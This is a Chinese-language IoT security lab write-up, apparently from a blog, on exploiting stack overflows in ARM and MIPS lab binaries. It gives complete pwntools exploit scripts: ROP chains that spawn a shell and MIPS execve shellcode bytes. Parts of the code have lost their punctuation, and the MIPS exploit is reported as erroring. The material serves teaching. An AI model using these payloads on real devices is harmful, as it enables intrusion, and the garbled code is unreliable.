长春快速建站公司,南京网站设计公司兴田德润优惠吗,wordpress 精彩,汕头模板开发建站物联网安全 文章目录 物联网安全IoT漏洞利用实操2#xff08;内存破坏漏洞#xff09;实验目的实验环境实验工具实验原理实验内容实验步骤ARM ROP构造与调试MIPS栈溢出漏洞逆向分析 IoT漏洞利用实操2#xff08;内存破坏漏洞#xff09;
实验目的
学会ARM栈溢出漏洞的原理…物联网安全 文章目录 物联网安全IoT漏洞利用实操2内存破坏漏洞实验目的实验环境实验工具实验原理实验内容实验步骤ARM ROP构造与调试MIPS栈溢出漏洞逆向分析 IoT漏洞利用实操2内存破坏漏洞
实验目的
学会ARM栈溢出漏洞的原理与利用方式 学会MIPS栈溢出漏洞的原理与利用方式
实验环境
操作机Ubuntu 20.04【用户名user 密码user】
实验工具
qemu gdb-multiarch python pwntools IDA Pro
实验原理
IoT 设备中可能存在各种漏洞总结来说这些漏洞可以被大体划分为两大类一类是内存破坏型漏洞另一类则是逻辑漏洞。而在内存破坏型漏洞中最常见的就是栈溢出漏洞。IoT 设备一般都采用非X86的架构其中常见的就是 ARM 架构和 MIPS 架构。栈溢出漏洞的利用和ROP的构造都与相应架构的栈结构有直接关系。 在没有任何保护机制的情况下要利用栈溢出只需将返回地址覆盖为跳转到栈的指令地址并在栈上后面添加shellcode就可以执行。但一般来说目前IoT设备内都有NX缓解机制数据所在的内存页被标记为不可执行此时再执行shellcode就会抛出异常。因此需要利用 ROP 技术Return-Oriented Programming返回导向编程通过扫描二进制程序文件提取出程序内部可用的gadget片段通常以返回指令结尾然后将这些gadget根据所需要的功能进行组合达到无须调用任何函数即可执行任意代码的目的。
实验内容
ARM栈溢出漏洞逆向分析 ARM ROP构造与调试 MIPS栈溢出漏洞逆向分析 MIPS ROP构造与调试
实验步骤
ARM栈溢出漏洞逆向分析 进入 ~/Desktop/experiment3/armrop 文件夹通过 file 命令查看存在漏洞的实验程序 armrop 的架构为 ARM架构并且为静态编译的程序。
通过命令 qemu-arm ./armrop利用 qemu 模拟运行该程序大致了解程序的功能和逻辑便于进一步逆向分析。
在终端中输入命令 wine ~/IDAPro7.5/ida.exe 打开 IDA通过 IDA 加载将要分析的漏洞程序 armrop
通过 IDA 逆向分析后可以发现程序的主要功能是不断输出字典中的字串并等待用户输入字串然后将输入的字串和已经输出的字串进行比较。不难发现栈溢出漏洞位置在函数 sub_8D24且溢出长度为 112即输入字符超过 112 之后就可以覆盖到栈上保存pc寄存器值的位置。
ARM ROP构造与调试
通过 checksec 命令可以查看该程序开启的保护发现开启了 NX 保护堆栈不可执行所以不能直接在栈上写 shellcode 并跳转执行。
这里通过 ROP 的方式进行利用按照 ARM 汇编的特点为了调用函数system(“/bin/sh”)需要找到控制 R0寄存器的gadget并找到程序中/bin/sh字符串的地址和system函数的地址。可以依次通过如下命令找到相应的 gadget 和 /bin/sh字符串的地址。 $ ROPgadget --binary ./armrop --only “pop|ret” $ ROPgadget --binary ./armrop --string “/bin/sh” 程序为静态编译所以system函数还在程序中通过逆向分析可以确定该函数位置为 0x110B4。
于是按照如下 exp.py 构造 ROP。
from pwn import *context.log_level debug# io process([qemu-arm, -g, 1234, ./armrop])
io process([qemu-arm, ./armrop])# pause()io.sendafter(quit\n, \n)
io.readline()# 0x00020904 : pop {r0, r4, pc}
# 0x0006c384 : /bin/shpayload A * 112 p32(0x20904) p32(0x6c384) * 2 p32(0x110B4)io.sendlineafter(\n, payload)io.interactive()运行之后可以拿到 shell。 另外只需要将 exp.py 中的 io 部分代码修改如下就可以利用 gdb-multiarch调试程序。
io process([qemu-arm, -g, 1234, ./armrop])
# io process([qemu-arm, ./armrop])在一个终端内运行 exp.py 脚本在另一个终端中启动输入命令gdb-multiarch然后在 gdb 中依次输入如下命令连接并调试 exp.py 脚本启动的 armrop 程序。
gdb-peda$ set architecture arm gdb-peda$ target remote :1234
之后在 gdb 中利用如下命令添加从漏洞函数返回前指令地址的断点并继续运行。 gdb-peda$ b *0x8DE8 gdb-peda$ c 再次断在 0x8DE8 时利用x/5i $pc查看将要执行的汇编指令利用 x/20wx $sp 命令查看此时的栈结构和exp的栈布局。 MIPS栈溢出漏洞逆向分析
进入 ~/Desktop/experiment3/mipsrop 文件夹通过 file 命令查看存在漏洞的实验程序 stack_bof 的架构为 MIPS 架构并且为动态编译的程序说明运行需要动态链接库其相关动态链接库在lib文件夹中。
通过命令 qemu-mipsel -L ./ ./stack_bof 任意参数利用 qemu 模拟运行该程序大致了解程序的功能和逻辑便于进一步逆向分析其中 -L 指定的就是动态链接库的路径。
在终端中输入命令 wine ~/IDAPro7.5/ida.exe 打开 IDA通过 IDA 加载将要分析的漏洞程序 stack_bof
通过 IDA 逆向分析后可以发现程序的主要功能是输出任意参数字符串。不难发现栈溢出漏洞位置在函数 main且溢出长度为 508即输入字符超过 508 之后就可以覆盖到栈上保存ra寄存器值的位置。 15
MIPS ROP构造与调试 通过 checksec 命令可以查看该程序开启的保护发现程序没有开启任何保护因此可以直接在栈上写 shellcode 并设法跳转执行。
由于 MIPS 具有指令流水的特点为了使得指令刷新到在栈上写的 shellcode这里还需要先通过 ROP 调用sleep函数然后再利用ROP跳转到栈上执行 shellcode。为了寻找合适的 gadget需要使用 IDA 的 mipsrop插件。由于程序是动态编译所以程序本身的gadget较少因此选择去其动态链接库中寻找可利用的gadget。利用 IDA 打开 ~/Desktop/experiment3/mipsrop/lib/libc.so.6。
先选择 mips rop gadgets 选项初始化该插件。 然后在 IDA 的python命令框中依次输入如下命令寻找 exp.py 对应的合适 gadget。
# Call sleep
mipsrop.find(li $a0, 1)
mipsrop.tail()
mipsrop.find(mov $t9, $s2)# Jmp shellcode
mipsrop.stackfinder()
mipsrop.find(move $t9, $a1)另外由于使用了动态链接库中的 gadget 还要确定stack_bof加载动态链接库libc.so.6的基地址。 在一个终端中输入 qemu-mipsel -L ./ -g 1234 ./stack_bof AAAAA
在另一个终端中输入命令gdb-multiarch然后在 gdb 中依次输入如下命令
gdb-peda$ set architecture mips gdb-peda$ target remote :1234 gdb-peda$ b *0x400944 gdb-peda$ c gdb-peda$ x/wx 0x411064 将得到的值减去 0x68210 结果就是libc.so.6的基地址。 于是按照如下 exp.py 构造 ROP。
from pwn import *
# context.log_level debuglibc_base 0x7f62e000
set_a0_addr 0x124474
# .text:00124474 move $t9, $s1
# .text:00124478 jalr $t9 ; close
# .text:0012447C li $a0, 1
set_s1_addr 0xAC71C
# .text:000AC71C lw $ra, 60($sp)
# .text:000AC720
# .text:000AC720 loc_AC720: # CODE XREF: readdir18C
# .text:000AC720 move $v0, $s0
# .text:000AC724 lw $s6, 56($sp)
# .text:000AC728 lw $s5, 52($sp)
# .text:000AC72C lw $s4, 48($sp)
# .text:000AC730 lw $s3, 44($sp)
# .text:000AC734 lw $s2, 40($sp)
# .text:000AC738 lw $s1, 36($sp)
# .text:000AC73C lw $s0, 32($sp)
# .text:000AC740 jr $ra
# .text:000AC744 addiu $sp, 64
jr_t9_jr_ra 0x8F3A4
# .text:0008F3A4 move $t9, $s2
# .text:0008F3A8 jalr $t9 ; uselocale
# .text:0008F3AC move $s0, $v0# .text:0008F3B0 lw $ra, 52($sp)
# .text:0008F3B4 move $v0, $s0
# .text:0008F3B8 lw $s3, 48($sp)
# .text:0008F3BC lw $s2, 44($sp)
# .text:0008F3C0 lw $s1, 40($sp)
# .text:0008F3C4 lw $s0, 36($sp)
# .text:0008F3C8 jr $ra
# .text:0008F3CC addiu $sp, 0x38addiu_a1_sp 0xF60D4
# .text:000F60D4 addiu $a1, $sp, 24
# .text:000F60D8 move $t9, $s3
# .text:000F60DC jalr $t9
jr_a1 0x11C68C
# .text:0011C68C move $t9, $a1
# .text:0011C690 move $a1, $a0
# .text:0011C694 jalr $t9
usleep 0xEA810
# sleep 0xB2600shellcode b
shellcode b\xff\xff\x06\x28 # slti $a2, $zero, -1
shellcode b\x62\x69\x0f\x3c # lui $t7, 0x6962
shellcode b\x2f\x2f\xef\x35 # ori $t7, $t7, 0x2f2f
shellcode b\xf4\xff\xaf\xaf # sw $t7, -0xc($sp)
shellcode b\x73\x68\x0e\x3c # lui $t6, 0x6873
shellcode b\x6e\x2f\xce\x35 # ori $t6, $t6, 0x2f6e
shellcode b\xf8\xff\xae\xaf # sw $t6, -8($sp)
shellcode b\xfc\xff\xa0\xaf # sw $zero, -4($sp)
shellcode b\xf4\xff\xa4\x27 # addiu $a0, $sp, -0xc
shellcode b\xff\xff\x05\x28 # slti $a1, $zero, -1
shellcode b\xab\x0f\x02\x24 # addiu $v0, $zero, 0xfab
shellcode b\x0c\x01\x01\x01 # syscall 0x40404pay
pay a*508
pay p32(set_s1_addrlibc_base)
pay b*32
pay 0000 #s0
pay p32(jr_t9_jr_ralibc_base) #s1
pay p32(usleeplibc_base) #s2
pay 3333 #s3
pay 4444 #s4
pay 5555 #s5
pay 6666 #s6
pay p32(set_a0_addrlibc_base) #ra
pay c*48
pay p32(jr_a1libc_base) #s3
pay p32(addiu_a1_splibc_base) #ra
pay d*24
pay shellcode# p process([qemu-mipsel, -L, ./, -g, 1234,./stack_bof, pay])
p process([qemu-mipsel, -L, ./, ./stack_bof,pay])
# pause()p.interactive()运行之后可以拿到 shell。 这边报错下边不在继续。
另外只需要将 exp.py 中的 io 部分代码修改如下就可以利用 gdb-multiarch调试程序。
p process([qemu-mipsel, -L, ./, -g, 1234,./stack_bof, pay])
# p process([qemu-mipsel, -L, ./, ./stack_bof,pay])在一个终端内运行 exp.py 脚本在另一个终端中启动输入命令gdb-multiarch然后在 gdb 中依次输入如下命令连接并调试 exp.py 脚本启动的 stack_bof程序。
gdb-peda$ set architecture mips gdb-peda$ target remote :1234 之后在 gdb 中利用如下命令添加从漏洞函数返回前指令地址的断点并继续运行。 gdb-peda$ b *0x4009A4 gdb-peda$ c 再次断在 0x4009A4 时利用x/5i $pc查看将要执行的汇编指令利用 x/20wx $sp 命令查看此时的栈结构和exp的栈布局。
